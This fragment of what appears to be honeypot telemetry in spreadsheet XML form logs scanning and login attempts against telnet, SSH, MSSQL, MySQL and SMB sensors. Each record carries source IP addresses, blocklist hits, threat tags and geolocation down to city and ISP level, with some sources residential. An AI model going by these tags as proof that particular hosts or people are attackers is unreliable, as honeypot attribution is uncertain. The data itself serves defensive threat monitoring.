    <s v="Telecom Cook Islands Ltd"/>
    <s v="business"/>
    <s v="Telecom Cook Islands Ltd"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="NA&amp;&amp;{Data_FTP:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:ca41:220b"/>
    <s v="None"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1517"/>
    <x v="1517"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T09:15:19"/>
    <d v="2023-07-30T11:19:20"/>
    <d v="2025-04-16T09:15:19"/>
    <n v="977"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H25&amp;&amp;SMA-LAB_SSH_H25&amp;&amp;SMA-LAB_MT-CPA_H43&amp;&amp;SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;22&amp;&amp;47192&amp;&amp;3306&amp;&amp;1433"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="SG"/>
    <s v="Ho Chi Minh"/>
    <s v="NA"/>
    <s v="Ho Chi Minh City"/>
    <s v="1566083"/>
    <s v="NA"/>
    <s v="10.8231"/>
    <s v="106.63"/>
    <s v="7552"/>
    <s v="Viettel Group"/>
    <s v="Newass2011xDSLHN"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2010-04-27"/>
    <s v="VIETTEL-VN"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_DHCP:{'53': 'x08', '55': 'x01x02x03x04x05x06x07x08_x0009__x000a_x0bx0c_x000d_x0ex0fx10x11x12x13x14x15x16x17x18x19x1ax1bx1cx1dx1ex1f !&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:1b48:4e85"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="medium&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1518"/>
    <x v="1518"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T09:14:16"/>
    <d v="2025-04-15T08:09:35"/>
    <d v="2025-04-16T09:14:16"/>
    <n v="5"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TR"/>
    <s v="Turkey"/>
    <s v="34"/>
    <s v="Istanbul"/>
    <s v="Kadıköy"/>
    <s v="Kızıltoprak"/>
    <s v="742935"/>
    <s v="NA"/>
    <s v="40.9802"/>
    <s v="29.042"/>
    <s v="47331"/>
    <s v="TTNet A.S."/>
    <s v="TurkTelecom"/>
    <s v="residential"/>
    <s v="Turk Telekomunikasyon A.S"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:51d7:d077"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1519"/>
    <x v="1519"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T09:03:52"/>
    <d v="2025-04-15T18:32:01"/>
    <d v="2025-04-16T09:03:52"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H19"/>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NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b63:8103"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1520"/>
    <x v="1520"/>
    <s v="NA"/>
    <x v="7"/>
    <d v="2025-04-16T09:00:57"/>
    <d v="2025-04-13T04:17:36"/>
    <d v="2025-04-16T09:00:57"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="PH"/>
    <s v="Philippines"/>
    <s v="00"/>
    <s v="National Capital Region"/>
    <s v="Southern Manila District"/>
    <s v="Taguig"/>
    <s v="1684308"/>
    <s v="1630"/>
    <s v="14.5535"/>
    <s v="121.05"/>
    <s v="132199"/>
    <s v="Globe Telecom Inc."/>
    <s v="GLBB"/>
    <s v="cellular"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:de7f:ed73"/>
    <s v="C-I&amp;&amp;C-U"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1521"/>
    <x v="1521"/>
    <s v="NA"/>
    <x v="8"/>
    <d v="2025-04-16T09:00:56"/>
    <d v="2025-01-03T05:36:02"/>
    <d v="2025-04-16T09:00:56"/>
    <n v="22"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;abuse.ch"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75d1:5c75"/>
    <s v="None"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1522"/>
    <x v="1522"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T08:45:48"/>
    <d v="2023-07-30T04:55:11"/>
    <d v="2025-04-16T08:45:48"/>
    <n v="28"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_SSH_H14&amp;&amp;SMA-LAB_MT-CPA_H18&amp;&amp;SMA-LAB_MSSQL_H26&amp;&amp;SMA-LAB_SMB_H26&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="22&amp;&amp;38753&amp;&amp;1433&amp;&amp;445&amp;&amp;3306"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="ID"/>
    <s v="Indonesia"/>
    <s v="JA"/>
    <s v="Jambi"/>
    <s v="Tebo Regency"/>
    <s v="Muara Tebo"/>
    <s v="1634792"/>
    <s v="NA"/>
    <s v="-1.46356"/>
    <s v="102.36"/>
    <s v="152364"/>
    <s v="Dinas Komunikasi dan Informatika Kabupaten Tebo"/>
    <s v="Diskominfo Kab Tebo"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="2024-01-31"/>
    <s v="IDNIC-KABTEBO-ID"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_SMB:Incoming connection (157.15.96.5,50101)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (157.15.96.5,57841)}&amp;&amp;{Data_SMB:Incoming connection (157.15.96.5,58512)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_SMB:Incoming connection (157.15.96.5,53453)}&amp;&amp;{Data_SMB:Incoming connection (157.15.96.5,54061)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:9d0f:6005"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1523"/>
    <x v="1523"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T08:34:24"/>
    <d v="2025-03-29T13:45:27"/>
    <d v="2025-04-16T08:34:24"/>
    <n v="6"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_H43&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="TN"/>
    <s v="Tamil Nadu"/>
    <s v="Mayiladuthurai"/>
    <s v="Mayiladuthurai"/>
    <s v="1263247"/>
    <s v="NA"/>
    <s v="11.1035"/>
    <s v="79.655"/>
    <s v="132774"/>
    <s v="Niss Internet services private limited"/>
    <s v="Niss Networks"/>
    <s v="hosting"/>
    <s v="Niss network solution private limited"/>
    <s v="2013-06-19"/>
    <s v="SPACIOUSHOSTING"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:671a:6d51"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1524"/>
    <x v="1524"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T08:27:12"/>
    <d v="2025-04-16T08:25:39"/>
    <d v="2025-04-16T08:27:12"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="26"/>
    <s v="Thừa Thiên Huế Province"/>
    <s v="Phú Lộc District"/>
    <s v="Phú Lộc"/>
    <s v="1570496"/>
    <s v="NA"/>
    <s v="16.2803"/>
    <s v="107.859"/>
    <s v="7552"/>
    <s v="Viettel Group"/>
    <s v="Viettel Group"/>
    <s v="residential"/>
    <s v="VIETTEL"/>
    <s v="2007-05-18"/>
    <s v="VIETTEL-VN"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7462:f904"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1525"/>
    <x v="1525"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T08:25:03"/>
    <d v="2025-04-16T08:06:36"/>
    <d v="2025-04-16T08:25:03"/>
    <n v="22"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="11"/>
    <s v="Seoul"/>
    <s v="NA"/>
    <s v="Seoul (Gyeongdongsijang-ro 12-gil)"/>
    <s v="1835848"/>
    <s v="NA"/>
    <s v="37.5822"/>
    <s v="127.042"/>
    <s v="9757"/>
    <s v="CMB DONDAEMOON BROADCASTING"/>
    <s v="CMB DONDAEMOON BROADCASTING"/>
    <s v="business"/>
    <s v="CMB DONGSEO BROADCASTING"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6e22:4b77"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1526"/>
    <x v="1526"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T08:12:29"/>
    <d v="2024-12-20T22:57:00"/>
    <d v="2025-04-16T08:12:29"/>
    <n v="38"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23&amp;&amp;NA"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TR"/>
    <s v="Turkey"/>
    <s v="16"/>
    <s v="Bursa Province"/>
    <s v="Osmangazi District"/>
    <s v="Bursa"/>
    <s v="750269"/>
    <s v="NA"/>
    <s v="40.1885"/>
    <s v="29.061"/>
    <s v="47331"/>
    <s v="TTNet A.S."/>
    <s v="TTNet A.S."/>
    <s v="residential"/>
    <s v="Turk Telekomunikasyon A.S"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:4ebd:8d46"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1527"/>
    <x v="1527"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T07:41:10"/>
    <d v="2025-04-16T07:40:58"/>
    <d v="2025-04-16T07:41:10"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MYSQL_HC1"/>
    <s v="3306"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="DE"/>
    <s v="Germany"/>
    <s v="HE"/>
    <s v="Hesse"/>
    <s v="Regierungsbezirk Darmstadt"/>
    <s v="Frankfurt am Main (Innenstadt I)"/>
    <s v="2925533"/>
    <s v="60326"/>
    <s v="50.0987"/>
    <s v="8.63226"/>
    <s v="39351"/>
    <s v="31173 Services AB"/>
    <s v="31173 Services AB"/>
    <s v="hosting"/>
    <s v="31173 Services Germany"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b9d1:c490"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1528"/>
    <x v="1528"/>
    <s v="NA&amp;&amp;staticline12544.toya.net.pl"/>
    <x v="0"/>
    <d v="2025-04-16T07:35:28"/>
    <d v="2025-02-08T22:42:20"/>
    <d v="2025-04-16T07:35:28"/>
    <n v="17"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23&amp;&amp;NA"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'b.barracudacentral.org': ['unknown']}"/>
    <n v="68"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="PL"/>
    <s v="Poland"/>
    <s v="10"/>
    <s v="Łódź Voivodeship"/>
    <s v="Lodz"/>
    <s v="Lodz (Polesie)"/>
    <s v="3093133"/>
    <s v="90-050"/>
    <s v="51.757"/>
    <s v="19.4411"/>
    <s v="16342"/>
    <s v="Toya sp.z.o.o"/>
    <s v="TOYA Sp. z o.o."/>
    <s v="business"/>
    <s v="Toya:net"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:5559:aa05"/>
    <s v="C-I_D"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1529"/>
    <x v="1529"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T07:33:10"/>
    <d v="2025-04-16T07:33:10"/>
    <d v="2025-04-16T07:33:10"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Janpath)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6296"/>
    <s v="77.2183"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7838:990b"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1530"/>
    <x v="1530"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T07:24:24"/>
    <d v="2025-04-16T07:21:55"/>
    <d v="2025-04-16T07:24:24"/>
    <n v="5"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="2007-08-01"/>
    <s v="BSNL-GSM-SouthZone"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75e7:87bd"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1531"/>
    <x v="1531"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T07:11:06"/>
    <d v="2025-04-14T11:41:31"/>
    <d v="2025-04-16T07:11:06"/>
    <n v="15"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H24"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="SG"/>
    <s v="Singapore"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="Singapore (Queenstown Estate)"/>
    <s v="1880252"/>
    <s v="NA"/>
    <s v="1.29596"/>
    <s v="103.791"/>
    <s v="55430"/>
    <s v="Starhub Internet Pte Ltd"/>
    <s v="StarHub Cable Vision Ltd"/>
    <s v="residential"/>
    <s v="SGCABLEVISION"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7458:8782"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1532"/>
    <x v="1532"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T07:07:36"/>
    <d v="2025-04-16T07:07:36"/>
    <d v="2025-04-16T07:07:36"/>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f:f2b3"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1533"/>
    <x v="1533"/>
    <s v="fixed-187-189-120-89.totalplay.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-16T06:50:49"/>
    <d v="2025-01-18T06:55:06"/>
    <d v="2025-04-16T06:50:49"/>
    <n v="15"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:ssh']"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="MX"/>
    <s v="Mexico"/>
    <s v="CMX"/>
    <s v="Mexico City"/>
    <s v="Miguel Hidalgo Borough"/>
    <s v="Miguel Hidalgo"/>
    <s v="3827408"/>
    <s v="NA"/>
    <s v="19.4341"/>
    <s v="-99.2002"/>
    <s v="22884"/>
